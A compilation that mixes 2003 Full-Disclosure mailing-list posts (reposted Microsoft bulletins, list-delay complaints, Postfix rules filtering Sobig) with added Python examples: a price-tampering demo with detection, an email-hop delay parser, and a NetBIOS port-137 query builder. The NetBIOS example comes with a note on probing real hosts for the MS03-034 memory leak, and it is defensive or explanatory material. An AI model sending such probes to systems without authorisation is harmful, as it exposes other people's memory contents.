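    item = form.get("item")
    if item not in CATALOGUE:
        raise ValueError("unknown item")
    try:
        qty = int(form.get("qty", ""))
    except ValueError:
        raise ValueError("quantity is not an integer") from None
    if not 1 <= qty <= MAX_QTY:
        raise ValueError("quantity out of range")
    return CATALOGUE[item] * qty


def tamper_signal(form):
    """Detection: if a form still carries a price field (for example a legacy
    hidden input), compare it with the catalogue so that a mismatch can be
    logged even though the hardened path never uses the submitted value."""
    item, submitted = form.get("item"), form.get("price")
    if item not in CATALOGUE or submitted is None:
        return None
    try:
        delta = Decimal(submitted) - CATALOGUE[item]
    except InvalidOperation:
        return "price field is not a number"
    return None if delta == 0 else f"submitted price differs from catalogue by {delta}"


if __name__ == "__main__":
    tampered = {"item": "rh-security-course", "qty": "1", "price": "0.99"}
    print("vulnerable:", vulnerable_total(tampered))
    print("hardened:  ", hardened_total(tampered))
    print("signal:    ", tamper_signal(tampered))
```

The hardened handler never raises on a tampered price because it never reads it; the tamper signal exists so that the attempt still shows up in logs, which is the difference between a fixed bug and a fixed bug you also notice being probed.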


Re: [Full-Disclosure] Microsoft Security Bulletin MS03-039

2003-09-10 Thread Irwan Hadi
On Wed, Sep 10, 2003 at 12:54:54PM -0400, Noel, Marcus wrote:

 http://www.microsoft.com/technet/security/bulletin/MS03-039.asp

As I would expect before, the RPC stuff will never be secured that fast.
Even on UNIX it took them years to make it secure.



[Full-Disclosure] Flaw in Visual Basic for Applications Could Allow Arbitrary Code Execution (822715)

2003-09-03 Thread Irwan Hadi
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-037.asp



Microsoft Security Bulletin MS03-037


Flaw in Visual Basic for Applications Could Allow Arbitrary Code
Execution (822715)
Originally posted: September 03, 2003

Summary
Who should read this bulletin: Customers using Microsoft ® Office
applications or applications that use Microsoft Visual Basic® for
Applications. 

Impact of vulnerability: Allow attacker to execute arbitrary code. 

Maximum Severity Rating: Critical 

Recommendation: Customers using Microsoft ® Office applications or
Microsoft Visual Basic for Applications should apply the patch at the
earliest available opportunity. 

End User Bulletin:
An end user version of this bulletin is available at: 

http://www.microsoft.com/security/security_bulletins/ms03-037.asp. 

Affected Software: 

Microsoft Visual Basic for Applications SDK 5.0 
Microsoft Visual Basic for Applications SDK 6.0 
Microsoft Visual Basic for Applications SDK 6.2 
Microsoft Visual Basic for Applications SDK 6.3 
Products which Include the Affected Software: 
Microsoft Access 97 
Microsoft Access 2000 
Microsoft Access 2002 
Microsoft Excel 97 
Microsoft Excel 2000 
Microsoft Excel 2002 
Microsoft PowerPoint 97 
Microsoft PowerPoint 2000 
Microsoft PowerPoint 2002 
Microsoft Project 2000 
Microsoft Project 2002 
Microsoft Publisher 2002 
Microsoft Visio 2000 
Microsoft Visio 2002 
Microsoft Word 97 
Microsoft Word 98(J) 
Microsoft Word 2000 
Microsoft Word 2002 
Microsoft Works Suite 2001 
Microsoft Works Suite 2002 
Microsoft Works Suite 2003 
Microsoft Business Solutions Great Plains 7.5 
Microsoft Business Solutions Dynamics 6.0 
Microsoft Business Solutions Dynamics 7.0 
Microsoft Business Solutions eEnterprise 6.0 
Microsoft Business Solutions eEnterprise 7.0 
Microsoft Business Solutions Solomon 4.5 
Microsoft Business Solutions Solomon 5.0 
Microsoft Business Solutions Solomon 5.5 

 Technical details
Technical description: 


Microsoft VBA is a development technology for developing client desktop
packaged applications and integrating them with existing data and
systems. Microsoft VBA is based on the Microsoft Visual Basic
development system. Microsoft Office products include VBA and make use
of VBA to perform certain functions. VBA can also be used to build
customized applications based around an existing host application. 

A flaw exists in the way VBA checks document properties passed to it
when a document is opened by the host application. A buffer overrun
exists which if exploited successfully could allow an attacker to
execute code of their choice in the context of the logged on user. 

In order for an attack to be successful, a user would have to open a
specially crafted document sent to them by an attacker. This document
could be any type of document that supports VBA, such as a Word
document, Excel spreadsheet, PowerPoint presentation. In the case where
Microsoft Word is being used as the HTML e-mail editor for Microsoft
Outlook, this document could be an e-mail, however the user would need
to reply to, or forward the mail message in order for the vulnerability
to be exploited. 

Mitigating factors: 

The user must open a document sent to them by an attacker in order for
this vulnerability to be exploited. 
When Microsoft Word is being used as the HTML e-mail editor in Outlook,
a user would need to reply to or forward a malicious e-mail document
sent to them in order for this vulnerability to be exploited. 
An attacker's code could only run with the same rights as the logged on
user. The specific privileges the attacker could gain through this
vulnerability would therefore depend on the privileges granted to the
user. Any limitations on a user's account, such as those applied through
Group Policies, would also limit the actions of any arbitrary code
executed by this vulnerability. 
Severity Rating: Microsoft Visual Basic for Applications SDK 5.0
Critical 
Microsoft Visual Basic for Applications SDK 6.0 Critical 
Microsoft Visual Basic for Applications SDK 6.2 Critical 
Microsoft Visual Basic for Applications SDK 6.3 Critical 
The above assessment is based on the types of systems affected by the
vulnerability, their typical deployment patterns, and the effect that
exploiting the vulnerability would have on them. 

Vulnerability identifier: CAN-2003-0347 

Tested Versions:
Microsoft tested Microsoft Visual Basic for Applications SDK 5.0,
Microsoft Visual Basic for Applications SDK 6.0, Microsoft Visual Basic
for Applications SDK 6.2 and Microsoft Visual Basic for Applications SDK
6.3 to assess whether they are affected by this vulnerability. In addition,
Microsoft investigated all supported versions of the software listed in
the Products which Include the Affected Software section to determine
whether they included the vulnerable software. Previous versions are no
longer supported, and may or may not be affected by these
vulnerabilities.


 Frequently 

[Full-Disclosure] Flaw in Microsoft Word Could Enable Macros toRun Automatically (827653)

2003-09-03 Thread Irwan Hadi
Just Released today

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-035.asp



Microsoft Security Bulletin MS03-035


Flaw in Microsoft Word Could Enable Macros to Run Automatically (827653)
Originally posted: September 03, 2003

Summary
Who should read this bulletin: Customers who are using Microsoft® Word 

Impact of vulnerability: Run macros without warning 

Maximum Severity Rating: Important 

Recommendation: Customers who are using affected versions of Microsoft
Word should apply the security patch immediately. 

End User Bulletin:
An end user version of this bulletin is available at: 

http://www.microsoft.com/security/security_bulletins/ms03-035.asp. 

Affected Software: 

Microsoft Word 97 
Microsoft Word 98 (J) 
Microsoft Word 2000 
Microsoft Word 2002 
Microsoft Works Suite 2001 
Microsoft Works Suite 2002 
Microsoft Works Suite 2003 

 Technical details
Technical description: 


A macro is a series of commands and instructions that can be grouped
together as a single command to accomplish a task automatically.
Microsoft Word supports the use of macros to allow the automation of
commonly performed tasks. Since macros are executable code it is
possible to misuse them, so Microsoft Word has a security model designed
to validate whether a macro should be allowed to execute depending on
the level of macro security the user has chosen.

A vulnerability exists because it is possible for an attacker to craft a
malicious document that will bypass the macro security model. If the
document was opened, this flaw could allow a malicious macro embedded in
the document to be executed automatically, regardless of the level at
which macro security is set. The malicious macro could take the same
actions that the user had permissions to carry out, such as adding,
changing or deleting data or files, communicating with a web site or
formatting the hard drive. 

The vulnerability could only be exploited by an attacker who persuaded a
user to open a malicious document .there is no way for an attacker to
force a malicious document to be opened.


Mitigating factors: 

The user must open the malicious document for an attacker to be
successful. An attacker cannot force the document to be opened
automatically. 
The vulnerability cannot be exploited automatically through e-mail. A
user must open an attachment sent in e-mail for an e-mail borne attack
to be successful. 
By default, Outlook 2002 blocks programmatic access to the Address Book.
In addition, Outlook 98 and 2000 block programmatic access to the
Outlook Address Book if the Outlook Email Security Update has been
installed. Customers who use any of these products would not be at risk
of propagating an e-mail borne attack that attempted to exploit this
vulnerability. 
The vulnerability only affects Microsoft Word; other members of the
Office product family are not affected. 
Severity Rating: Microsoft Word (all versions) Important 
Microsoft Works Suite (all versions) Important 

The above assessment is based on the types of systems affected by the
vulnerability, their typical deployment patterns, and the effect that
exploiting the vulnerability would have on them. 

Vulnerability identifier: CAN-2003-0664 

Tested Versions:
Microsoft tested Microsoft Word 2002, Microsoft Word 2000, Microsoft
Word 98(J), Microsoft Word 97, Microsoft Word X for Macintosh, Microsoft
Word 2001 for Macintosh, Microsoft Word 98 for Macintosh, Microsoft
Works Suite 2003, Microsoft Works Suite 2002 and Microsoft Works Suite
2001 to assess whether they are affected by this vulnerability. Previous
versions are no longer supported and may or may not be affected by this
vulnerability.


 Frequently asked questions 
What's the scope of the vulnerability?

This vulnerability could enable an attacker to create a document that,
when opened in Microsoft Word, could allow an unsigned macro to run
regardless of the macro security level. Macros can take any action that
the user can take, and as a result this vulnerability could allow an
attacker to take actions such as changing data, communicating with Web
sites, reformatting the hard disk, or changing the Word security
settings. The vulnerability only affects Word; other members of the
Office product family are not affected.

What causes the vulnerability?

The vulnerability results because Word incorrectly checks properties in
a modified document, causing it to not prompt the user with a macro
security warning when macros are present in the document.

What's a macro?

Generally, the term macro refers to a small program that automates
frequently-performed tasks in an operating system or in a program. For
example, all members of the Office family of products support the use of
macros. This allows companies to develop macros that perform as
sophisticated productivity tools that run in Word, in Excel, or in other
programs. 

Like any computer program, macros can be misused. Many viruses are

[Full-Disclosure] Unchecked buffer in Microsoft Access Snapshot Viewer Could Allow Code Execution (827104)

2003-09-03 Thread Irwan Hadi
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-038.asp



Microsoft Security Bulletin MS03-038


Unchecked buffer in Microsoft Access Snapshot Viewer Could Allow Code
Execution (827104)
Originally posted: September 3, 2003

Summary
Who should read this bulletin: Customers who use Microsoft® Access or
who use the downloadable Microsoft Access Snapshot Viewer 

Impact of vulnerability: Allow an attacker to execute code of their
choice 

Maximum Severity Rating: Moderate 

Recommendation: Customers who use Microsoft Access or who use the
downloadable Microsoft Access Snapshot Viewer should install the
security patch at their earliest opportunity. 

End User Bulletin:
An end user version of this bulletin is available at: 

http://www.microsoft.com/security/security_bulletins/ms03-038.asp. 

Affected Software: 

Microsoft Access 97 
Microsoft Access 2000 
Microsoft Access 2002 

 Technical details
Technical description: 


With Microsoft Access Snapshot Viewer, you can distribute a snapshot of
a Microsoft Access database that allows the snapshot to be viewed
without having Access installed. For example, a customer may want to
send a supplier an invoice that is generated by using an Access
database. With Microsoft Access Snapshot Viewer, the customer can
package the database so that the supplier can view it and print it
without having Access installed. The Microsoft Access Snapshot Viewer is
available with all versions of Access - though it is not installed by
default - and is also available as a separate stand-alone download. The
Snapshot Viewer is implemented by using an ActiveX control. 

A vulnerability exists because of a flaw in the way that Snapshot Viewer
validates parameters. Because the parameters are not correctly checked,
a buffer overrun can occur, which could allow an attacker to execute the
code of their choice in the security context of the logged-on user. 

For an attack to be successful, an attacker would have to persuade a
user to visit a malicious Web site that is under the attacker's control. 

Mitigating factors: 

The Microsoft Access Snapshot Viewer is not installed with Microsoft
Office by default. 
An attacker would need to persuade a user to visit a website under the
attacker's control for an attack to be successful. 
An attacker's code would run with the same permissions as the user. If a
user's permissions were restricted the attacker would be similarly
restricted. 
Severity Rating: Microsoft Access (all versions)  Moderate 
The above assessment is based on the types of systems affected by the
vulnerability, their typical deployment patterns, and the effect that
exploiting the vulnerability would have on them. 

Vulnerability identifier: CAN-2003-0665 

Tested Versions:
Microsoft tested Access 2002, Access 2000, and Access 97 to assess
whether they are affected by this vulnerability. Previous versions are
no longer supported and may or may not be affected by this
vulnerability.


 Frequently asked questions 
What's the scope of the vulnerability?

This is a buffer overrun vulnerability. An attacker who successfully
exploited this vulnerability could run programs on another user's
system. Such a program could take any action that the user could take,
such as adding, changing, or deleting any data or configuration
information. For example, the code could lower the security settings in
the browser or write a file to the hard disk. Because the code would run
as the user and not as the operating system, any security limitations on
the user's account would also be applicable to any code that is run by
successfully exploiting this vulnerability. In environments where user
accounts are restricted, such as enterprise environments, the actions
that an attacker's code could take would be limited by these
restrictions.

What causes the vulnerability?

The vulnerability results because of an unchecked buffer in the ActiveX
control that Microsoft Access Snapshot Viewer uses. By invoking a
specific function in a particular manner, an attacker could overflow the
buffer and gain the ability to run code in the user's security context.

What is the Microsoft Access Snapshot Viewer?

With the Microsoft Access Snapshot Viewer, you can distribute a snapshot of a
Microsoft Access database that allows the snapshot to be viewed without
having Access installed. For example, a customer may want to send a
supplier an invoice that is generated by using an Access database; the
Snapshot viewer would allow the customer to package the database. With
Microsoft Access Snapshot Viewer, the supplier can view it and print it
without having Access installed. 

The Microsoft Access Snapshot Viewer is available with all versions of
Microsoft Office - though it is not installed by default - and is also
available as a separate stand-alone download. The Snapshot Viewer is
implemented by using an ActiveX control.

What is an ActiveX control?

ActiveX is a technology that allows 

[Full-Disclosure] Flaw in NetBIOS Could Lead to Information Disclosure (824105)

2003-09-03 Thread Irwan Hadi
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-034.asp



Microsoft Security Bulletin MS03-034


Flaw in NetBIOS Could Lead to Information Disclosure (824105)
Originally posted: September 03, 2003

Summary
Who should read this bulletin: Customers using Microsoft® Windows® 

Impact of vulnerability: Information disclosure 

Maximum Severity Rating: Low 

Recommendation: Users should evaluate whether to apply the security
patch to affected systems. 

End User Bulletin:
An end user version of this bulletin is available at: 

http://www.microsoft.com/security/security_bulletins/ms03-034.asp. 

Affected Software: 

Microsoft Windows NT 4.0® Server 
Microsoft Windows NT 4.0, Terminal Server Edition 
Microsoft Windows 2000 
Microsoft Windows XP 
Microsoft Windows Server 2003 
Not Affected Software: 
Microsoft Windows Millennium Edition 

 Technical details
Technical description: 


Network basic input/output system (NetBIOS) is an application
programming interface (API) that can be used by programs on a local area
network (LAN). NetBIOS provides programs with a uniform set of commands
for requesting the lower-level services required to manage names,
conduct sessions, and send datagrams between nodes on a network. 

This vulnerability involves one of the NetBT (NetBIOS over TCP)
services, namely, the NetBIOS Name Service (NBNS). NBNS is analogous to
DNS in the TCP/IP world and it provides a way to find a system's IP
address given its NetBIOS name, or vice versa. 

Under certain conditions, the response to a NetBT Name Service query
may, in addition to the typical reply, contain random data from the
target system's memory. This data could, for example, be a segment of
HTML if the user on the target system was using an Internet browser, or
it could contain other types of data that exist in memory at the time
that the target system responds to the NetBT Name Service query. 

An attacker could seek to exploit this vulnerability by sending a NetBT
Name Service query to the target system and then examine the response to
see if it included any random data from that system's memory. 

If best security practices have been followed and port 137 UDP has been
blocked at the firewall, Internet based attacks would not be possible. 

Mitigating factors: 

Any information disclosure would be completely random. 
By default, the Internet Connection Firewall (ICF), which is available
with Windows XP and Windows Server 2003, blocks the ports that are used
by NetBT. 
To exploit this vulnerability, an attacker would have to be able to send
a specially-crafted NetBT request to port 137 on the target system and
then examine the response to see whether any random data from that
system's memory is included. In intranet environments, these ports are
usually accessible, but systems that are connected to the Internet
usually have these ports blocked by a firewall. 
Severity Rating: Windows NT 4.0 Server Low 
Windows NT 4.0, Terminal Server Edition Low 
Windows 2000 Low 
Windows XP Low 
Windows Server 2003 Low 
The above assessment is based on the types of systems affected by the
vulnerability, their typical deployment patterns, and the effect that
exploiting the vulnerability would have on them. 

Vulnerability identifier: CAN-2003-0661 

Tested Versions:
Microsoft tested Windows NT 4.0 Server, Windows NT 4.0 Terminal Server
Edition, Windows 2000, Windows Millennium Edition, Windows XP, and
Windows Server 2003 to assess whether they are affected by this
vulnerability. Previous versions are no longer supported, and may or may
not be affected by these vulnerabilities.


 Frequently asked questions 
What's the scope of the vulnerability?

This is an Information Disclosure vulnerability that could enable an
attacker to receive arbitrary or random data from the memory of another
computer system that is on a network. 

Under certain conditions, the response to a NetBT Name Service query
may, in addition to the normal reply, contain random data from the
target system's memory. This data could, for example, be a segment of
HTML if the user on the target system were using an Internet browser at
the time that the target system responds to the NetBT Name Service
query. It could also contain other types of data, depending on what data
exists in memory at the time that the target system responds to the
NetBT Name Service query. To exploit the vulnerability, the attacker
must be able to access the target system over NetBT. 

The potential information disclosure cannot be directed or controlled.
Any data that an attacker might receive would be very arbitrary in its
nature because the information disclosure is limited to random segments
of data that are in memory. 

An attacker could increase the probability of this memory disclosure by
repeatedly sending NetBT Name Service queries 
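
The exchange the bulletin describes, as an added example that is not part of the bulletin or of this post: a builder for the wildcard node-status query that goes to UDP port 137 (the same datagram `nbtstat -A` sends) and a parser for the reply that reports anything the reply carries beyond the fields RFC 1002 defines. The sample reply is constructed in code, not a capture. The page does not say where inside a reply the MS03-034 data actually appears, so the two "surplus" fields (`trailing`, `extra_in_rdata`) are a generic structural check and an assumption on my part, not a description of the flaw.

```python
"""NetBT Name Service node-status exchange (UDP/137): build the query,
parse the reply, and flag any bytes past the structure RFC 1002 defines.
Added illustration; the sample reply is constructed, not captured."""
import struct

NBSTAT = 0x0021          # node status record type
CLASS_IN = 0x0001
STATS_LEN = 46           # fixed STATISTICS block after the name list (RFC 1002 4.2.18)
NAME_ENTRY_LEN = 18      # 15-byte name + 1-byte suffix + 2-byte NAME_FLAGS


def encode_name(name: str, suffix: int = 0x00, pad: bytes = b" ") -> bytes:
    """RFC 1002 first-level encoding: 16 raw bytes -> 32 chars in 'A'..'P'."""
    raw = name.encode("ascii")[:15].ljust(15, pad) + bytes([suffix])
    enc = bytearray()
    for b in raw:
        enc += bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)])
    return bytes([32]) + bytes(enc) + b"\x00"       # length byte, label, terminator


def build_node_status_query(txid: int) -> bytes:
    """Wildcard '*' query (name '*' padded with NULs), one question, no answers."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name("*", pad=b"\x00") + struct.pack(">HH", NBSTAT, CLASS_IN)


def build_node_status_response(txid: int, names, mac: bytes, trailing: bytes = b"") -> bytes:
    """Constructed reply for testing; `trailing` simulates surplus bytes after the record."""
    rdata = bytes([len(names)])
    for name, suffix, flags in names:
        rdata += name.encode("ascii").ljust(15, b" ") + bytes([suffix]) + struct.pack(">H", flags)
    rdata += mac.ljust(STATS_LEN, b"\x00")           # UNIT_ID (MAC) then zeroed counters
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)   # response, authoritative
    rr = encode_name("*", pad=b"\x00") + struct.pack(">HHIH", NBSTAT, CLASS_IN, 0, len(rdata))
    return header + rr + rdata + trailing


def parse_node_status_response(data: bytes) -> dict:
    """Decode the name list and MAC, and return any bytes outside the defined layout."""
    txid, flags, _, ancount, _, _ = struct.unpack(">HHHHHH", data[:12])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not an NBNS response carrying an answer")
    off = 12
    off += 1 + data[off] + 1                         # skip length byte, 32-char label, terminator
    rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
    off += 10
    if rtype != NBSTAT:
        raise ValueError("answer is not a node status record")
    rdata = data[off:off + rdlen]
    names = []
    p = 1
    for _ in range(rdata[0]):
        e = rdata[p:p + NAME_ENTRY_LEN]
        names.append((e[:15].rstrip(b" ").decode("ascii", "replace"), e[15],
                      struct.unpack(">H", e[16:])[0]))
        p += NAME_ENTRY_LEN
    return {
        "txid": txid,
        "names": names,
        "mac": rdata[p:p + 6].hex(":"),
        "extra_in_rdata": rdata[p + STATS_LEN:],     # inside RDATA but past the fixed statistics
        "trailing": data[off + rdlen:],              # after the record, outside any declared field
    }


if __name__ == "__main__":
    print("query:", build_node_status_query(0x1234).hex())
    sample = build_node_status_response(
        0x1234,
        [("TESTBOX", 0x00, 0x0400), ("WORKGROUP", 0x00, 0x8400)],
        mac=b"\x00\x11\x22\x33\x44\x55",             # constructed
        trailing=b"<html>",                          # constructed surplus to exercise the check
    )
    r = parse_node_status_response(sample)
    print(r["names"], r["mac"], "surplus:", r["trailing"])
```

To use it against a real host, send `build_node_status_query()` over UDP to port 137 and hand the reply datagram to `parse_node_status_response()`; a non-empty `trailing` or `extra_in_rdata` is the kind of unexplained content the bulletin tells you to look for, and a host that answers at all from the Internet is the firewall gap the bulletin's mitigation section assumes is closed.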

Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?

2003-09-02 Thread Irwan Hadi
On Tue, Sep 02, 2003 at 09:12:10AM +0200, Marc Ruef wrote:

  
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 Dear List
 
 I was looking for some sources that serve translations of Buce Schneiers well-known 
 Crypto-Gram[1]. So I found on the official page the hint, that there are some 
 outdated Issues in a german version available.
 
 After clicking in the link that brings me to http://www.galad.com/extras/cg/cg.htm , 
 my Internet Explorer 6.0.2800.1106 encounters a problem and needs to close. After 
 a bit of debugging I could determine that the problem must be existing in the 
 library mshtml.dll.
 
 I tried to do a small and dirty analysis of the problem. So I fetched the whole page 
 that encounters the error, but I couldn't reproduce the program shutdown with the 
 offline version. It doesn't matter if I keep the original linking and embedded 
 pictures as a link to the original web source.
 

It worked fine for me, running IE 6.0 with the latest patches on Win
2000. Maybe just because you don't have the latest patches on your
computer.

PS: for the admin of this list, it seems that it's time to switch to a
faster Mail Transport Agent like Postfix or qmail. See the difference
between the email from this person received on my two different mail
accounts. Seems interesting:

Tue, 2 Sep 2003 01:35:41 -0600
Tue,  2 Sep 2003 01:52:52 -0600 (MDT)

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?

2003-09-02 Thread Irwan Hadi
On Tue, Sep 02, 2003 at 01:56:24AM -0600, Irwan Hadi wrote:
 PS: for the admin of this list, it seems that it's time to switch to a
 faster Mail Transport Agent like Postfix or qmail. See the difference
 between the email from this person received on my two different mail
 accounts. Seems interesting:
 
 Tue, 2 Sep 2003 01:35:41 -0600
 Tue,  2 Sep 2003 01:52:52 -0600 (MDT)

Even more interesting:
Received: from netsys.com (NETSYS.COM [199.201.233.10])
by phxby.engr.usu.edu (Postfix) with ESMTP id 4A3F11443EF
for [EMAIL PROTECTED]; Tue,  2 Sep 2003 02:44:14
-0600 (MDT)
Received: from NETSYS.COM (localhost [127.0.0.1])
by netsys.com (8.11.6p2/8.11.6) with ESMTP id h827wOx20101;
Tue, 2 Sep 2003 03:58:24 -0400 (EDT)
Received: from phxby.engr.usu.edu (phxby.engr.usu.edu [129.123.21.101])
by netsys.com (8.11.6p2/8.11.6) with ESMTP id h827uUE19665
for [EMAIL PROTECTED]; Tue, 2 Sep 2003 03:56:30
-0400 (EDT)
Received: by phxby.engr.usu.edu (Postfix, from userid 501)
id 6607B14438C; Tue,  2 Sep 2003 01:56:24 -0600 (MDT)

I believe that for infosec stuff, the faster the information is
distributed/sent, the better. Being late to apply a patch just because the
information arrived almost 1 hour after it was sent might be
catastrophic.

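
The latency the post is measuring can be read straight out of the Received: chain. The following is an added example, not part of the post: it unfolds the four headers quoted above onto one line each (the `[EMAIL PROTECTED]` placeholder is kept as the archive shows it), parses the timestamp after the last `;` on each, and reports the delay each MTA added. Received: lines are prepended by each hop, so the list is newest-first and is reversed to walk the path in order.

```python
"""Per-hop delay from a Received: header chain.  Added example; the four
headers are the ones quoted in the post, unfolded onto single lines."""
import re
from email.utils import parsedate_to_datetime

# Headers as they appear in the message, newest hop first.
RECEIVED = [
    "Received: from netsys.com (NETSYS.COM [199.201.233.10]) by phxby.engr.usu.edu "
    "(Postfix) with ESMTP id 4A3F11443EF for [EMAIL PROTECTED]; Tue,  2 Sep 2003 02:44:14 -0600 (MDT)",
    "Received: from NETSYS.COM (localhost [127.0.0.1]) by netsys.com (8.11.6p2/8.11.6) "
    "with ESMTP id h827wOx20101; Tue, 2 Sep 2003 03:58:24 -0400 (EDT)",
    "Received: from phxby.engr.usu.edu (phxby.engr.usu.edu [129.123.21.101]) by netsys.com "
    "(8.11.6p2/8.11.6) with ESMTP id h827uUE19665 for [EMAIL PROTECTED]; Tue, 2 Sep 2003 03:56:30 -0400 (EDT)",
    "Received: by phxby.engr.usu.edu (Postfix, from userid 501) id 6607B14438C; "
    "Tue,  2 Sep 2003 01:56:24 -0600 (MDT)",
]

BY_RE = re.compile(r"\bby\s+([^\s(;]+)")   # the MTA that stamped this hop


def hop_delays(received):
    """Return [(stamping host, seconds since the previous stamp)], oldest hop first.

    Timestamps are compared as absolute instants, so the -0600 / -0400 zone
    offsets on the two sides are handled by the datetime arithmetic."""
    stamps = []
    for line in reversed(received):                 # oldest hop first
        host = BY_RE.search(line).group(1)
        when = parsedate_to_datetime(line.rsplit(";", 1)[1].strip())
        stamps.append((host, when))
    return [(host, int((t - prev).total_seconds()))
            for (host, t), (_, prev) in zip(stamps[1:], stamps)]


def total_transit_seconds(received):
    return sum(delay for _, delay in hop_delays(received))


if __name__ == "__main__":
    for host, delay in hop_delays(RECEIVED):
        print(f"{delay:6d}s  until stamped by {host}")
    print(f"{total_transit_seconds(RECEIVED):6d}s  total submission-to-delivery")
```

On these headers the first two hops (submission to the list's MTA, then its local loop) take seconds; nearly all of the transit time sits between netsys.com accepting the message and handing it back out, which is the list-server delay the post is complaining about rather than anything on the sending side.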


Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?

2003-09-02 Thread Irwan Hadi
On Tue, Sep 02, 2003 at 10:47:48AM +0200, Marc Ruef wrote:
 Well, I am very sure, that I installed all available (security) patches
 for my Windows XP Professional and the Microsoft Internet Explorer 6.0
 (checked windowsupdate.com a few minutes ago). Please check that you
 clicked the link and not did copy and paste (see Donnies reply and my
 response).

I tried both, more than 8 times, reloaded the page more than 10 times,
and none affected my IE.

This is my mshtml.dll:
07/13/2003  04:02p   2,793,472 MSHTML.DLL
Version: 6.0.2800.1226

O/S: Win2K + SP4, English.



Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?

2003-09-02 Thread Irwan Hadi
On Tue, Sep 02, 2003 at 10:42:58AM -0700, Tim wrote:

 
 I don't know about catastrophic, but it certainly should be faster.  I
 personally find the speed of this list unacceptable.  For large lists
 with high volume, a list server written in a scripting language like
 python isn't going to cut it, IMHO.  I vote for qmail w/ ezmlm(-idx).
 (That is, if we get a vote in the matter.)

A list with thousands of subscribers that uses EZMLM + qmail, which does single
recipient delivery? Huh, the server may need at least a dual DS3
to spit out those emails in time. Mailman+Python in this case is fine;
the problem is just the old, slow, insecure Sendmail.



[Full-Disclosure] No more windowsupdate for Windows 2000 Server Family?

2003-08-24 Thread Irwan Hadi
I've just visited http://windowsupdate.microsoft.com to update my
Windows 2000 Server and Advanced Server, and I got this every time I went
there (with the latest IE 6.0, etc. I just want to get the last IE and MDAC
updates):


http://v4.windowsupdate.microsoft.com/en/thanks.asp

Thank you for your interest in Windows Update

Windows Update is the online extension of Windows that helps you get the
most out of your computer.

The latest version of Windows Update is available on computers that are
running Microsoft Windows 98, Windows 98 Second Edition, Windows
Millennium Edition, Windows 2000 (except Windows 2000 Datacenter
Server), Windows XP, and the Windows Server 2003 family.

=

When I tried to open windowsupdate from my Windows 2000 Professional
box, it works fine. So can the Windows 2000 server families not use
windowsupdate anymore, or what? I think Microsoft should give the server
families higher priority than the desktop family, since if a server is
down, there are more desktops that can't access the things they need
than if one desktop is down!!!



Re: [Full-Disclosure] No more windowsupdate for Windows 2000 Server Family?

2003-08-24 Thread Irwan Hadi
On Sun, Aug 24, 2003 at 02:59:51AM -0600, Irwan Hadi wrote:

 I've just visited http://windowsupdate.microsoft.com to update my
 Windows 2000 Server and Advanced Server, and I got this every time I went
 there (with the latest IE 6.0, etc. I just want to get the last IE and MDAC
 updates):
 
 
 http://v4.windowsupdate.microsoft.com/en/thanks.asp
 
 Thank you for your interest in Windows Update
 
 Windows Update is the online extension of Windows that helps you get the
 most out of your computer.
 
 The latest version of Windows Update is available on computers that are
 running Microsoft Windows 98, Windows 98 Second Edition, Windows
 Millennium Edition, Windows 2000 (except Windows 2000 Datacenter
 Server), Windows XP, and the Windows Server 2003 family.
 
 =

It seems they were down. A few more minutes later, I can run
windowsupdate again.



Re: [Full-Disclosure] Is this caused by Sobig?

2003-08-22 Thread Irwan Hadi
On Sat, Aug 23, 2003 at 10:45:56AM +1000, gregh wrote:

 
 See attached text file.
 
 As many of you are, so am I being pinged quite a lot. So, I checked out a few of the 
 pings and I am getting this same thing each time.
 
 Is this an effect of Sobig? I hadn't noticed anything quite like this before a few 
 weeks ago.

If that many ports appear open, then usually that means the box
has a firewall in front of it.

 
 Greg.



Re: [Full-Disclosure] Idea

2003-08-21 Thread Irwan Hadi
On Thu, Aug 21, 2003 at 11:12:06AM -0700, D B wrote:

 i have always had an idea but never any place to
 try it
 
 i would like people with experience to tell me what
 they  think of it
 
 assuming a  unix / linux operating system as a server
 
 install the services  get them configured
 ...remove all booting hardware except the drive 
 then change the roots shell to /bin/false and and
 remove all working shells from the OS
 
 to configure or modify things one would have to
 install boot hardware and then use other boot media
 containing a shell 
 
 only problem is ...i dont know of anything service
 wise that requires little to no modification on a
 regular basis
 
 firewall ...router ?...ftp server ?
 
 k ...flame on 

Put a firewall, router, ftp, etc. on it, but just don't connect it to any
network, and you'll be safe.
Anyhow, how are you going to update the box remotely, in case you need to
do it ASAP, if you can't even log in to it??



Re: [Full-Disclosure] Re: Filtering sobig with postfix

2003-08-21 Thread Irwan Hadi
On Fri, Aug 22, 2003 at 08:43:45AM +1200, Bojan Zdrnja wrote:
 
 /filename=.*(your_details|your_document|document_all)\.pif/ REJECT
 
 You might want to reject all .pif files, and also:
 
 /(Virus found|VIRUS ALERT)/ DISCARD
 
 
 To discard all those messages originating from improperly configured MTA's,
 which were able to detect Sobig-F, but which still send notification to
 faked from: address.
 
 After you edit that file just issue:
 
 # /usr/sbin/postmap /etc/postfix/header_checks
 

You don't need to postmap the header_checks file, because you are using
regexp:.
You *only* need to postmap it if you use hash:, dbm: or btree:.

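
To see what a regexp: header_checks table like the one in this thread will actually do before loading it into Postfix, here is an added example (mine, not the thread's or Postfix's code) that evaluates such a table the way Postfix does: one `/pattern/flags action` per line, `#` comments and blank lines ignored, patterns case-insensitive unless the `i` flag toggles that off, a leading `!` negating the match, first matching line wins, and each header line (field name included) tested on its own. The table below reuses the thread's Sobig rule with the dot escaped and adds two rules of my own; the sample message headers are constructed. `if`/`endif` blocks and the other regexp_table(5) features are not emulated.

```python
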